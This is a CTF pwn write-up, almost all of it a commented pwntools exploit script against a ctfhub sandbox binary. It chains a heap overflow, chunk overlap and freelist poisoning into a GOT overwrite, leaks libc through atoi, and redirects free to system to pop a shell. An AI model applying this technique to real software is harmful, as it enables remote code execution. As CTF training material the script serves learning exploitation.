慢慢更,太懒了直接给出代码
from pwn import *
from LibcSearcher import *
# pwntools context: 'debug' echoes every byte sent/received on the tube,
# amd64/linux select the word size used by p64()/u64() below.
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
# Remote CTF sandbox instance; the commented line is the local alternative
# (host/port are presumably instance-specific — confirm before reuse).
io = remote("challenge-049a92ae96535d90.sandbox.ctfhub.com",31154)
#io = process(pwnfile)
# Target binary, parsed for its PLT/GOT addresses.
elf = ELF(pwnfile)
# The challenge-provided libc; its symbol offsets are used to turn the leaked
# address into the libc base.
libc = ELF("./libc-2.23.so")
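def add(size):
    """Select menu option 1 (allocate) and send the requested chunk size.

    Args:
        size: size value passed to the program's allocator; it is sent as
            its decimal representation.

    Returns:
        None. Reads the prompts from and writes to the global ``io`` tube.
    """
    io.recvuntil(b"Choice:")
    io.sendline(b"1")
    io.recvuntil(b"Size: ")
    # Send explicit bytes, consistent with the b"..." literals used for
    # every other write in this script instead of relying on pwntools'
    # implicit str-to-bytes conversion.
    io.sendline(str(size).encode())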
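def edit(idx,data):
    """Select menu option 2 (edit) and write ``data`` into slot ``idx``.

    Args:
        idx: slot index as understood by the program; sent in decimal.
        data: bytes to write. ``sendline`` appends a newline after them.

    Returns:
        None. Reads the prompts from and writes to the global ``io`` tube.
    """
    io.recvuntil(b"Choice:")
    io.sendline(b"2")
    io.recvuntil(b"Index: ")
    # Explicit bytes, matching the b"..." literals used elsewhere in the file.
    io.sendline(str(idx).encode())
    io.recvuntil(b"Content: ")
    io.sendline(data)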
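def free(idx):
    """Select menu option 3 (free) for slot ``idx``.

    Args:
        idx: slot index as understood by the program; sent in decimal.

    Returns:
        None. Reads the prompts from and writes to the global ``io`` tube.
    """
    io.recvuntil(b"Choice:")
    io.sendline(b"3")
    io.recvuntil(b"Index: ")
    # Explicit bytes, matching the b"..." literals used elsewhere in the file.
    io.sendline(str(idx).encode())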
# Addresses resolved from the binary: free@got is later rewritten, atoi@got is
# the entry whose contents get leaked, and the two PLT stubs are the values
# written into the GOT.
puts_plt = elf.plt['puts']
free_got = elf.got['free']
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
# Heap setup: one 0x18-byte chunk (slot 0) followed by 27 chunks of 0x10
# (slots 1..27, assuming the program fills slots in order — confirm against
# the binary), then a 0x21 request.
add(0x18)
for i in range(1,28):
    add(0x10)
add(0x21)
# Address of a fake chunk used below; 0x602130 presumably lies in the
# program's .bss near its slot table — the script does not derive it, so it
# must be checked against this specific binary.
ptr_chunk = 0x602130-8
# Root cause visible from the script: edit() accepts 0x20 bytes for a chunk
# allocated with 0x18, so the trailing 8 bytes spill past slot 0's data.  With
# the usual glibc layout that lands on the next chunk's size field, which is
# set to 0x41.  A length check in edit() against the stored size would stop
# the chain here.
edit(0,b"a"*0x18+p64(0x41))
# Free slots 1 and 2, then request 0x30: the enlarged chunk is handed back and
# presumably overlaps what was slot 2.
free(1)
free(2)
add(0x30)
# Through the overlap, rewrite the freed slot-2 chunk's header (0x21) and its
# forward pointer to ptr_chunk.
edit(1,p64(0)*3+p64(0x21)+p64(ptr_chunk))
add(0x10)
# Slot 30 is not one this script allocated explicitly; its meaning depends on
# the program's slot bookkeeping — TODO confirm against the binary.
free(30)
# The next edit addresses this allocation as slot 29, so it presumably lands
# at ptr_chunk and gives write access to the slot table itself.
add(0x18)
# Point slot 0 at free@got and slot 1 at atoi@got.
edit(29,b"a"*8+p64(free_got)+p64(atoi_got))
# Writing through slot 0 now overwrites free@got with puts@plt (and the
# following 8 bytes with printf@plt).  Full RELRO would make this GOT write
# fail.
edit(0,p64(puts_plt)+p64(printf_plt))
# free(1) therefore calls puts on atoi@got, printing the libc atoi address.
free(1)
# NOTE(review): recv(6) returns *up to* 6 bytes; the leak assumes all six
# arrive in one read.
atoi_addr = u64(io.recv(6).ljust(8,b"\x00"))
# Rebase: libc base from the leaked atoi, then system from the same libc.
libc_addr = atoi_addr-libc.sym['atoi']
system_addr = libc_addr+libc.sym['system']
print(hex(libc_addr))
print(hex(atoi_addr))
# Place the command string in slot 5, redirect free@got to system, then
# free(5) runs system("/bin/sh").
edit(5,b"/bin/sh\x00")
edit(0,p64(system_addr)+p64(printf_plt))
# add(0x10)
free(5)
io.interactive()